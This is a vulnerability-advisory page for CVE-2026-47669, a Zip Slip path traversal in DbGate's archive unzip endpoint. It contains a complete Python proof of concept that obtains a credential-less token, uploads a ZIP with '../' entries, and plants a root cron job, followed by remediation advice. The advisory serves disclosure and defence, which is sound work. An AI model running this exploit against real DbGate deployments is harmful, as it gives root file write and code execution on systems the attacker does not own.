Skip to main content

DbGate CVE-2026-47669

CRITICAL
Path Traversal (CWE-22)
2026-06-05 https://github.com/dbgate/dbgate GHSA-h535-j5hr-mv56
Share

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 05, 2026 - 16:52 vuln.today
Analysis Generated
Jun 05, 2026 - 16:52 vuln.today

DescriptionCVE.org

The unzipDirectory() function in packages/api/src/shell/unzipDirectory.js (line 27) does not validate that extracted file paths stay within the output directory. A malicious ZIP with ../ entries writes files anywhere on the filesystem.

In the default Docker deployment, DbGate runs as root and the none auth provider issues JWT tokens without credentials via POST /auth/login, so this is exploitable by any network-adjacent attacker.

Affected code:

packages/api/src/shell/unzipDirectory.js, line 27:

js
const destPath = path.join(outputDirectory, entry.fileName);
// No check that destPath stays within outputDirectory

Called from packages/api/src/controllers/archive.js, lines 291-293:

js
async unzip({ folder }) {
    const newFolder = await this.getNewArchiveFolder({ database: folder.slice(0, -4) });
    await unzipDirectory(path.join(archivedir(), folder), path.join(archivedir(), newFolder));

The archive controller also has zero permission checks and zero path traversal protection on any of its endpoints.

PoC:

python
import requests, zipfile, io

TARGET = "http://localhost:3000"
# Get auth token (no credentials needed in default Docker)
r = requests.post(f"{TARGET}/api/auth/login", json={"amoid": "none"})
token = r.json()["accessToken"]
hdrs = {"Authorization": f"Bearer {token}"}
# Create malicious ZIP with path traversal
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr("../../../../../../etc/cron.d/dbgate-pwn",
                "* * * * * root id > /tmp/pwned\n")
buf.seek(0)
# Upload ZIP
r = requests.post(f"{TARGET}/api/uploads/upload", headers=hdrs,
                  files={"data": ("evil.zip", buf, "application/zip")})
info = r.json()
# Save to archive
requests.post(f"{TARGET}/api/archive/save-uploaded-zip", headers=hdrs,
              json={"filePath": info["filePath"], "fileName": "evil.zip"})
# Trigger Zip Slip - writes cron job to /etc/cron.d/
requests.post(f"{TARGET}/api/archive/unzip", headers=hdrs,
              json={"folder": "evil.zip"})
print("Check /tmp/pwned after 1 minute")

Impact: Arbitrary file write as root -> RCE. Full container compromise in Docker deployments.

AnalysisAI

Remote code execution in DbGate versions 7.1.8 and earlier allows network-adjacent attackers to achieve full container compromise via a Zip Slip flaw in the archive unzip endpoint. Because the default Docker deployment runs as root and the bundled 'none' authentication provider issues JWT tokens without credentials, any attacker reachable on the network can upload a malicious ZIP that writes files anywhere on the filesystem, including cron entries for code execution. Publicly available exploit code exists in the GHSA advisory itself, and an upstream patched release (7.1.9) is available.

Technical ContextAI

DbGate is an open-source database management web application distributed as the npm package 'dbgate' (pkg:npm/dbgate) and commonly deployed as a Docker container. The root cause is a CWE-22 path traversal in packages/api/src/shell/unzipDirectory.js at line 27, where destPath is computed as path.join(outputDirectory, entry.fileName) without verifying that the resolved path remains within outputDirectory. This is the canonical 'Zip Slip' pattern: archive entries containing '../' sequences resolve outside the intended extraction directory. The vulnerable function is invoked from the archive controller's unzip handler (packages/api/src/controllers/archive.js, lines 291-293), which exposes the behavior over HTTP and, per the advisory, lacks both permission checks and path traversal protection across its endpoints. The exposure is amplified by two deployment characteristics: the default Docker image runs the Node.js process as root, and the 'none' auth provider mints valid JWTs from POST /auth/login without any credentials.

RemediationAI

Vendor-released patch: upgrade dbgate to version 7.1.9 or later, available at https://github.com/dbgate/dbgate/releases/tag/v7.1.9, per the GHSA advisory at https://github.com/dbgate/dbgate/security/advisories/GHSA-h535-j5hr-mv56; for Docker users this means pulling the 7.1.9 (or newer) image tag and redeploying. If immediate upgrade is not possible, disable the 'none' authentication provider and require a real auth backend so that anonymous POST /auth/login no longer mints valid JWTs (trade-off: existing automation that relied on credential-less access will break and must be reconfigured). Additionally restrict network exposure of the DbGate API to trusted administrative networks via firewall, reverse-proxy ACLs, or a VPN, since the archive/unzip and uploads endpoints are the attack surface (trade-off: remote users must connect through the chosen access path). Where feasible, run the container as a non-root user and mount the filesystem read-only outside the archive directory to blunt the arbitrary-file-write primitive (trade-off: may require image rebuild and breaks any feature that writes outside the archive dir).

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-47669 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy